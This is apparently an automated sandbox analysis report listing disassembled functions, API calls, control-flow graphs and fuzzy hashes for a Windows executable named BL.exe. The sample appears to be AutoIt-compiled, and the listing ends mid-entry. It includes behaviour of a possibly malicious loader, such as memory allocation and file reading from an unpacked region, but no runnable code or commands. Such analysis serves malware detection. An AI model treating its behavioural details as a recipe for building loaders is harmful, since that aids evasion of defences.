                                                                                                                            control_flow_graph 138 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 147 40e506-40e509 138->147 148 42accc-42acd1 138->148 149 40e540-40e555 call 40ee70 147->149 150 40e50b-40e51c 147->150 151 42acd3-42acdb 148->151 152 42acdd-42ace0 148->152 169 40e557-40e573 GetCurrentProcess call 40ee30 149->169 170 40e579-40e5a8 149->170 153 40e522-40e525 150->153 154 42ac9b-42aca7 150->154 156 42ad12-42ad20 151->156 157 42ace2-42aceb 152->157 158 42aced-42acf0 152->158 153->149 160 40e527-40e537 153->160 162 42acb2-42acba 154->162 163 42aca9-42acad 154->163 168 42ad28-42ad2d GetSystemInfo 156->168 157->156 158->156 159 42acf2-42ad06 158->159 164 42ad08-42ad0c 159->164 165 42ad0e 159->165 166 42acbf-42acc7 160->166 167 40e53d 160->167 162->149 163->149 164->156 165->156 166->149 167->149 172 42ad38-42ad3d GetSystemInfo 168->172 169->170 180 40e575 169->180 170->172 173 40e5ae-40e5c3 call 40eee0 170->173 173->168 177 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 173->177 182 40e5e0-40e5ef 177->182 183 40e5dd-40e5de FreeLibrary 177->183 180->170 184 40e5f1-40e5f2 FreeLibrary 182->184 185 40e5f4-40e5ff 182->185 183->182 184->185
                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                                                            • String ID: pMH$#v
                                                                                                                            • API String ID: 2923339712-1800489730
                                                                                                                            • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                            • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                            • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                            • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                            Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                            • String ID: IsThemeActive$uxtheme.dll
                                                                                                                            • API String ID: 2574300362-3542929980
                                                                                                                            • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                            • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                            • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                            • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                                                                            Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167registryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                            • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                            • _wcsncat.LIBCMT ref: 00410C78
                                                                                                                            • __wmakepath.LIBCMT ref: 00410C94
                                                                                                                              • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                            • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                            • _wcscat.LIBCMT ref: 00429C43
                                                                                                                            • _wcslen.LIBCMT ref: 00429C55
                                                                                                                            • _wcslen.LIBCMT ref: 00429C66
                                                                                                                            • _wcscat.LIBCMT ref: 00429C80
                                                                                                                            • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                            • API String ID: 1004883554-2276155026
                                                                                                                            • Opcode ID: 5537ed625c4de096e6c94be945ac80c2a72a9db179e929550bf68a842ddf9e08
                                                                                                                            • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                            • Opcode Fuzzy Hash: 5537ed625c4de096e6c94be945ac80c2a72a9db179e929550bf68a842ddf9e08
                                                                                                                            • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                                                            Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                            • String ID: FILE
                                                                                                                            • API String ID: 3888824918-3121273764
                                                                                                                            • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                            • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                                            • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                            • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA
                                                                                                                            Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                            • RegisterClassExW.USER32 ref: 00410359
                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                            • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                            • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(00981400,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                            • API String ID: 2914291525-1005189915
                                                                                                                            • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                            • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                                                                                                                            • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                                                                                                                            • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                                                                                                                            Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74windowregistryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                            • LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                            • LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                            • LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                            • RegisterClassExW.USER32 ref: 004102C6
                                                                                                                              • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                                                                                                                              • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                                                                                                                              • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                              • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                              • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                              • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                              • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00981400,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                            • String ID: #$0$PGH
                                                                                                                            • API String ID: 423443420-3673556320
                                                                                                                            • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                            • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                                                                                                                            • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                                                                                                                            • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                                                                                                                            Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _fseek.LIBCMT ref: 004525DA
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452618
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452629
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452644
                                                                                                                            • __fread_nolock.LIBCMT ref: 00452661
                                                                                                                            • _fseek.LIBCMT ref: 0045267D
                                                                                                                            • _malloc.LIBCMT ref: 00452689
                                                                                                                            • _malloc.LIBCMT ref: 00452696
                                                                                                                            • __fread_nolock.LIBCMT ref: 004526A7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock$_fseek_malloc_wcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1911931848-0
                                                                                                                            • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                            • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                                                                                                                            • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                                                                                                                            • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A
                                                                                                                            Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 228 40f450-40f45c call 425210 231 40f460-40f478 228->231 231->231 232 40f47a-40f4a8 call 413990 call 410f70 231->232 237 40f4b0-40f4d1 call 4151b0 232->237 240 40f531 237->240 241 40f4d3-40f4da 237->241 244 40f536-40f540 240->244 242 40f4dc-40f4de 241->242 243 40f4fd-40f517 call 41557c 241->243 245 40f4e0-40f4e2 242->245 248 40f51c-40f51f 243->248 247 40f4e6-40f4ed 245->247 249 40f521-40f52c 247->249 250 40f4ef-40f4f2 247->250 248->237 253 40f543-40f54e 249->253 254 40f52e-40f52f 249->254 251 42937a-4293a0 call 41557c call 4151b0 250->251 252 40f4f8-40f4fb 250->252 265 4293a5-4293c3 call 4151d0 251->265 252->243 252->245 256 40f550-40f553 253->256 257 40f555-40f560 253->257 254->250 256->250 259 429372 257->259 260 40f566-40f571 257->260 259->251 261 429361-429367 260->261 262 40f577-40f57a 260->262 261->247 264 42936d 261->264 262->250 264->259 265->244
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fread_nolock_fseek_strcat
                                                                                                                            • String ID: AU3!$EA06
                                                                                                                            • API String ID: 3818483258-2658333250
                                                                                                                            • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                            • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                                                                            • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                                                                            • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B
                                                                                                                            Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 268 410130-410142 SHGetMalloc 269 410148-410158 SHGetDesktopFolder 268->269 270 42944f-429459 call 411691 268->270 271 4101d1-4101e0 269->271 272 41015a-410188 call 411691 269->272 271->270 278 4101e6-4101ee 271->278 280 4101c5-4101ce 272->280 281 41018a-4101a1 SHGetPathFromIDListW 272->281 280->271 282 4101a3-4101b1 call 411691 281->282 283 4101b4-4101c0 281->283 282->283 283->280
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                                                                            • String ID: C:\Users\user\Desktop\BL.exe
                                                                                                                            • API String ID: 192938534-351473123
                                                                                                                            • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                            • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                                                                            • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                                                                            • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6
                                                                                                                            Function 03DDC5F8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 286 3ddc5f8-3ddc6a6 call 3dda008 289 3ddc6ad-3ddc6d3 call 3ddd508 CreateFileW 286->289 292 3ddc6da-3ddc6ea 289->292 293 3ddc6d5 289->293 300 3ddc6ec 292->300 301 3ddc6f1-3ddc70b VirtualAlloc 292->301 294 3ddc825-3ddc829 293->294 295 3ddc86b-3ddc86e 294->295 296 3ddc82b-3ddc82f 294->296 302 3ddc871-3ddc878 295->302 298 3ddc83b-3ddc83f 296->298 299 3ddc831-3ddc834 296->299 303 3ddc84f-3ddc853 298->303 304 3ddc841-3ddc84b 298->304 299->298 300->294 305 3ddc70d 301->305 306 3ddc712-3ddc729 ReadFile 301->306 307 3ddc8cd-3ddc8e2 302->307 308 3ddc87a-3ddc885 302->308 313 3ddc855-3ddc85f 303->313 314 3ddc863 303->314 304->303 305->294 315 3ddc72b 306->315 316 3ddc730-3ddc770 VirtualAlloc 306->316 311 3ddc8e4-3ddc8ef VirtualFree 307->311 312 3ddc8f2-3ddc8fa 307->312 309 3ddc889-3ddc895 308->309 310 3ddc887 308->310 317 3ddc8a9-3ddc8b5 309->317 318 3ddc897-3ddc8a7 309->318 310->307 311->312 313->314 314->295 315->294 319 3ddc777-3ddc792 call 3ddd758 316->319 320 3ddc772 316->320 323 3ddc8b7-3ddc8c0 317->323 324 3ddc8c2-3ddc8c8 317->324 322 3ddc8cb 318->322 326 3ddc79d-3ddc7a7 319->326 320->294 322->302 323->322 324->322 327 3ddc7a9-3ddc7d8 call 3ddd758 326->327 328 3ddc7da-3ddc7ee call 3ddd568 326->328 327->326 334 3ddc7f0 328->334 335 3ddc7f2-3ddc7f6 328->335 334->294 336 3ddc7f8-3ddc7fc CloseHandle 335->336 337 3ddc802-3ddc806 335->337 336->337 338 3ddc808-3ddc813 VirtualFree 337->338 339 3ddc816-3ddc81f 337->339 338->339 339->289 339->294
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03DDC6C9
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03DDC8EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204938950.0000000003DDA000.00000040.00000020.00020000.00000000.sdmp, Offset: 03DDA000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3dda000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFileFreeVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 204039940-0
                                                                                                                            • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                            • Instruction ID: 587de646613424771fd1b2f67f7563927bed9cd34f8321f3b76137f88c11ccab
                                                                                                                            • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                            • Instruction Fuzzy Hash: 4FA10574E10209EBDB14CFA4C898FEEBBB5FF48704F248599E501BB280D7759A45CBA4
                                                                                                                            Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
